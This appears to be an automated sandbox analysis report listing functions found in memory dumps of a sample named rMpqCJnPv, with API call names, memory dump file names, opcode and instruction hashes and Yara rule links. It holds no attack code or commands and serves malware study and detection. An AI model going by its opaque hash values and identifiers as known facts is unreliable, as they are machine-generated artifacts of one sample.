                                                                                                                    • Opcode Fuzzy Hash: 2f06d0b1d19ede39c94ed452b1c65b617356a11cb49397c7e380f0e2becba314
                                                                                                                    • Instruction Fuzzy Hash: 98A10962A0938245FF606B6CA0003B9E691BF22794F984635DF1D077EDDF3CE46483A1
                                                                                                                    Function 00007FF7BB81ED08 Relevance: 7.7, APIs: 5, Instructions: 203COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3215553584-0
                                                                                                                    • Opcode ID: f29f2ab1c13e66daf1f8c2b4a146e68bdfc50a5cc3b930cf9745f903616afb6d
                                                                                                                    • Instruction ID: 11d251aa7990832af7bfb3300a413b9aa06c0a2a023e53563ec60745d02fbd8a
                                                                                                                    • Opcode Fuzzy Hash: f29f2ab1c13e66daf1f8c2b4a146e68bdfc50a5cc3b930cf9745f903616afb6d
                                                                                                                    • Instruction Fuzzy Hash: 8C81E722A1A61285F720BB2DD4405FDA7A1BBAA745F800135DF0E17AF9CF3CD465C760
                                                                                                                    Function 00007FF7BB880084 Relevance: 7.6, APIs: 5, Instructions: 141registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3740051246-0
                                                                                                                    • Opcode ID: bd38130d0a6c74a4fb364d1ff2c50e7e9d7a3923237d5797147a29dace5ff8d3
                                                                                                                    • Instruction ID: 3e6243eaf920af55128a6c06b90a36982fd5854e9cc8c7254525db515a640dd4
                                                                                                                    • Opcode Fuzzy Hash: bd38130d0a6c74a4fb364d1ff2c50e7e9d7a3923237d5797147a29dace5ff8d3
                                                                                                                    • Instruction Fuzzy Hash: 14619022A08A4285EB10EBADD4443BDA760FF9A794F804132DF4D0767ACF7CD155C790
                                                                                                                    Function 00007FF7BB87D0F8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7BB87C2BF), ref: 00007FF7BB87D176
                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7BB87C2BF), ref: 00007FF7BB87D217
                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7BB87C2BF), ref: 00007FF7BB87D236
                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7BB87C2BF), ref: 00007FF7BB87D281
                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7BB87C2BF), ref: 00007FF7BB87D2A0
                                                                                                                      • Part of subcall function 00007FF7BB804120: WideCharToMultiByte.KERNEL32 ref: 00007FF7BB804160
                                                                                                                      • Part of subcall function 00007FF7BB804120: WideCharToMultiByte.KERNEL32 ref: 00007FF7BB80419C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 666041331-0
                                                                                                                    • Opcode ID: c3fd7c48fc9f9c2f8ece9fb323df923621d5475b61cd025522e48c4117cd4c81
                                                                                                                    • Instruction ID: 19a7b43ccf6544b67b62655a50dc777292782ffaa66bc8bf053e104798fd5e84
                                                                                                                    • Opcode Fuzzy Hash: c3fd7c48fc9f9c2f8ece9fb323df923621d5475b61cd025522e48c4117cd4c81
                                                                                                                    • Instruction Fuzzy Hash: E9513D72A15B0685EB00EB5ED8541ACB3B4FBAAB84B954032DF4E47779DF38E451C360
                                                                                                                    Function 00007FF7BB822998 Relevance: 7.6, APIs: 5, Instructions: 133COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3215553584-0
                                                                                                                    • Opcode ID: 69caafc8f8afcb53c87a7f7053d9646584506dbe7d8e8e6cfd9f4db44817ad77
                                                                                                                    • Instruction ID: eb786d6ab903f2b9b12672f40dfe846a12fe6ef1d1193c7bef07ea0bef83f565
                                                                                                                    • Opcode Fuzzy Hash: 69caafc8f8afcb53c87a7f7053d9646584506dbe7d8e8e6cfd9f4db44817ad77
                                                                                                                    • Instruction Fuzzy Hash: 33519522608B8285E660AF1D9444179F695FF66BA0F944335DF6E0B6FCDE3CE461C350
                                                                                                                    Function 00007FF7BB8696A8 Relevance: 7.6, APIs: 5, Instructions: 128COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: PrivateProfile$SectionWrite$String
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2832842796-0
                                                                                                                    • Opcode ID: 0b837300edce471d6350899edce4403351e4598010b5efb7b0f71f94874427a1
                                                                                                                    • Instruction ID: 92fe3478606db82a72cc054f791aca64c00338b76f19dbcd2258a32273febc9b
                                                                                                                    • Opcode Fuzzy Hash: 0b837300edce471d6350899edce4403351e4598010b5efb7b0f71f94874427a1
                                                                                                                    • Instruction Fuzzy Hash: 76512B26618A4682EB14EF2ED48056DA760FB9AF94F449032EF8E4777ACF3DE450C750
                                                                                                                    Function 00007FF7BB81BA2C Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 190572456-0
                                                                                                                    • Opcode ID: a18f96543d52060ea1fb4eaea9751658dcb69330229f7bbe75e5b271c8b8e6e3
                                                                                                                    • Instruction ID: 952ab2ffaa2b244e3bd96ae3cf2867ed77a1ec55f78bed44986b4cebe603ecd1
                                                                                                                    • Opcode Fuzzy Hash: a18f96543d52060ea1fb4eaea9751658dcb69330229f7bbe75e5b271c8b8e6e3
                                                                                                                    • Instruction Fuzzy Hash: 3641B561B0B70281EA11AF5E99041B9E391BFAABD0F898535DF5D4B6BCDE3CE4108390
                                                                                                                    Function 00007FF7BB88FF50 Relevance: 7.6, APIs: 5, Instructions: 109COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Show$Enable
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2939132127-0
                                                                                                                    • Opcode ID: c489c8d02495f69c1778672d4edb055e6fea3c7ece5ab9feb79cbeb3e5804fe0
                                                                                                                    • Instruction ID: cb223f050ccb5b6578b413a1b7f1aacbfe184742bfc66a24e9015998b9e510f5
                                                                                                                    • Opcode Fuzzy Hash: c489c8d02495f69c1778672d4edb055e6fea3c7ece5ab9feb79cbeb3e5804fe0
                                                                                                                    • Instruction Fuzzy Hash: D1516122A0978A85FF509B2DD864278B760FB96B44FA85136CF8D47278CE3DF451C760
                                                                                                                    Function 00007FF7BB84D924 Relevance: 7.6, APIs: 5, Instructions: 91sleepwindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePostSleep$RectWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3382505437-0
                                                                                                                    • Opcode ID: 53e5e18aae174657f43a3affddf2552eb5f4829ae1ffd7803c72ea05724a17bc
                                                                                                                    • Instruction ID: 378726072905a8a3fb7270217b2e28ea89e402eef5ea2ca300765ff822bb72aa
                                                                                                                    • Opcode Fuzzy Hash: 53e5e18aae174657f43a3affddf2552eb5f4829ae1ffd7803c72ea05724a17bc
                                                                                                                    • Instruction Fuzzy Hash: 753106366083054BE710DF2DE448269B791F799BA8F800135EF9D877A8CE3CEC558750
                                                                                                                    Function 00007FF7BB863824 Relevance: 7.6, APIs: 5, Instructions: 89windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2256411358-0
                                                                                                                    • Opcode ID: c134d4337344e0b5e6f60fa6ff3406e13c81d8ed9a5a6472cdeb4b0526b89ef4
                                                                                                                    • Instruction ID: 4d0fcac216c294abe17603eb5cd2f726f6ed3f368a7119538c18fdc110c9e625
                                                                                                                    • Opcode Fuzzy Hash: c134d4337344e0b5e6f60fa6ff3406e13c81d8ed9a5a6472cdeb4b0526b89ef4
                                                                                                                    • Instruction Fuzzy Hash: 93415F2190C64685FB50AB2CD4547B9A690FF6BB44FD8003ADE4E851B9CF2CE465C7A0
                                                                                                                    Function 00007FF7BB851B34 Relevance: 7.6, APIs: 5, Instructions: 74windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindowwcsstr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2655805287-0
                                                                                                                    • Opcode ID: 7569226d5d9cd6ad03c787613e70eafed3f89705f6b34130dcc7c13fbeedf83f
                                                                                                                    • Instruction ID: 9ca563e08062a0f24ceea0e988388651e3129c69d66598dd5aeb12f2b2fcc909
                                                                                                                    • Opcode Fuzzy Hash: 7569226d5d9cd6ad03c787613e70eafed3f89705f6b34130dcc7c13fbeedf83f
                                                                                                                    • Instruction Fuzzy Hash: 6A210722B0978241EF05AB2EA954175A290BF9AFE0F844530EF5D477A8DE3CE460C390
                                                                                                                    Function 00007FF7BB872E64 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ForegroundPixelRelease
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4156661090-0
                                                                                                                    • Opcode ID: 0803af3d0555ee4f2e7cd4680bdbd11eb807c22797343ae4eaf726b5c3b1d4d7
                                                                                                                    • Instruction ID: 6b669c2a7052963c7a845188aa737063ed78e021daa3521915660b550739bd06
                                                                                                                    • Opcode Fuzzy Hash: 0803af3d0555ee4f2e7cd4680bdbd11eb807c22797343ae4eaf726b5c3b1d4d7
                                                                                                                    • Instruction Fuzzy Hash: 4A216222B08B4186EB04EF6ED4840ADE3A0FB9AF94B444435DF5D87B6ADE78D4918790
                                                                                                                    Function 00007FF7BB811F44 Relevance: 7.6, APIs: 5, Instructions: 60threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2067211477-0
                                                                                                                    • Opcode ID: 5a03c1e74c727ad6943a6aafe1eddabbbd93acb60c7f9608f7f9e8f5502f6952
                                                                                                                    • Instruction ID: 83ce129d3325e301937c8d8e98f34536950b5a4df5892a6f0df2b2d61cde778c
                                                                                                                    • Opcode Fuzzy Hash: 5a03c1e74c727ad6943a6aafe1eddabbbd93acb60c7f9608f7f9e8f5502f6952
                                                                                                                    • Instruction Fuzzy Hash: F3213025A0A74285EE15FF6DE4101B9E390BFEAB80B844531DF4D4777DDF2CE82486A0
                                                                                                                    Function 00007FF7BB81F9D4 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _set_statfp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1156100317-0
                                                                                                                    • Opcode ID: e270cafaa1c1bb403facffb31b6a836e27aa4e45b093d38abbba4bbe7c8013ef
                                                                                                                    • Instruction ID: 7d68981de964802a2a0bafa2ef5da4f324b795291010178926a67009ef37b15a
                                                                                                                    • Opcode Fuzzy Hash: e270cafaa1c1bb403facffb31b6a836e27aa4e45b093d38abbba4bbe7c8013ef
                                                                                                                    • Instruction Fuzzy Hash: 6F118F66E1BA0305F654312DE44237595427FFF3A8F854234EF6E466FE8E1CAC6081A0
                                                                                                                    Function 00007FF7BB805244 Relevance: 7.6, APIs: 5, Instructions: 54COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Initialize__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_initialize_onexit_tables_invalid_parameter_noinfo_onexit_set_fmode
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2117695475-0
                                                                                                                    • Opcode ID: c6240938d00ce931eff62a9f8efb7c75b2bc90d30c2bcb96158b33b23c092f9e
                                                                                                                    • Instruction ID: f46ca339341ab8f73367895a60fdab26920807e1dc96d43dc0d3a07efc09618b
                                                                                                                    • Opcode Fuzzy Hash: c6240938d00ce931eff62a9f8efb7c75b2bc90d30c2bcb96158b33b23c092f9e
                                                                                                                    • Instruction Fuzzy Hash: D2115D00E4D54745FA1472BD94A62F892D16FBB381FC80439EF1D562FF9E2CA86582F2
                                                                                                                    Function 00007FF7BB84CB58 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 44706859-0
                                                                                                                    • Opcode ID: 18e3121f69b2f55043958739cbc43e37301fc4036db83b04d1dc9e6091f96284
                                                                                                                    • Instruction ID: 4206d3df6427bd2da6ede48c9290bdef504225eab2c8293395bcbcad40cd0223
                                                                                                                    • Opcode Fuzzy Hash: 18e3121f69b2f55043958739cbc43e37301fc4036db83b04d1dc9e6091f96284
                                                                                                                    • Instruction Fuzzy Hash: D1119E36A04B42CAE710DF5AE844159B7B4FB9AF80B954436CF8903B28DF7CE865C780
                                                                                                                    Function 00007FF7BB84CAB4 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
